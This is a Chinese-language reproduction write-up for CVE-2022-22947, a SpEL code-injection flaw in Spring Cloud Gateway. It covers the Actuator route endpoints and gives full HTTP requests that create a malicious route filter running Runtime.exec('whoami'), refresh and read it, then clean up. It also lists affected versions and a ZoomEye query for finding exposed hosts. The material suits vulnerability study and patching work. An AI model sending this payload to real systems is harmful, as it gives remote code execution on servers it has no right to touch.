springcloudgatewayRCE(spEl表达式)

CVE-2022-22947

Spring Cloud Gateway
Remote Code Execute 漏洞
/ SpEL Code Injection 漏洞

基本介绍

cloud全家桶

网关作用

l 智能路由 l 负载均衡 l 协议转换 l 权限校验 l 限流熔断 l 黑白名单 l API监控 l 日志审计

Spring Clout Gateway使用

<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
</dependency>

Spring Cloud Gateway概念

l 路由（Route）
l 断言（Predicate）
l 过滤器（Filter）

原理分析

为了更加方便地给装配赋值，而出的漏洞

Spel概述

Spring表达式语言全称为“Spring Expression Language”，缩写为“SpEL”，类似于Struts2x中使用的OGNL表达式语言，能在运行时构建复杂表达式、存取对象图属性、对象方法调用等等，并且能与Spring功能完美整合，如能用来配置Bean定义。

从Spring 3开始引入了Spring表达式语言，它能够以一种强大而简洁的方式将值装配到Bean属性和构造器参数中，在这个过程中所使用的表达式会在运行时计算得到值。使用SpEL你可以实现超乎想象的装配效果，这是其他装配技术很难做到的

为什么添加过滤器（路由）会造成代码执行

利用流程：

1. 开启Acutator（监听），可以用该接口列出路由（过滤器），如：/actustor/gateway/routes
2. 可以通过/gateway/routes/{id_route_to_create}创建路由
3. 通过/actuator/gateway/refresh刷新路由
4. 当路由器带有恶意的Filter，里面的spEL表达式会被执行

payload分析

T：占位符

Actuator操作Gateway接口列表

http://host:port/actuator/gateway/id

id	HTTP Method	描述
globalfilters	GET	返回全局Filter列表
routefilters	GET	每个路由的filter
routes	GET	路由列表
routes/	GET	指定路由的信息
routes/	POST	创建路由
refresh	POST	刷新路由缓存
routes/	DELETE	删除路由

漏洞复现

启动网关服务

方式一：bp抓包放包

post请求添加过滤器规则

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "wuyaaq",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

刷新规则

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:9000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
Origin: null
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

a=1

get访问恶意规则id

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

清除数据包，删除所添加的路由

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Length: 2

再次刷新路由

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:9000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
Origin: null
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

a=1

方式二：启动自动化脚本

扫描发现

影响范围

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
[https://tanzu.vmware.com/security/cve-2022- 22947](https://tanzu.vmware.com/security/cve-2022- 22947)
Pivotal

扫描资产

zoomeye

app="vmware-SpringBoot-framework"

脚本扫描scan.py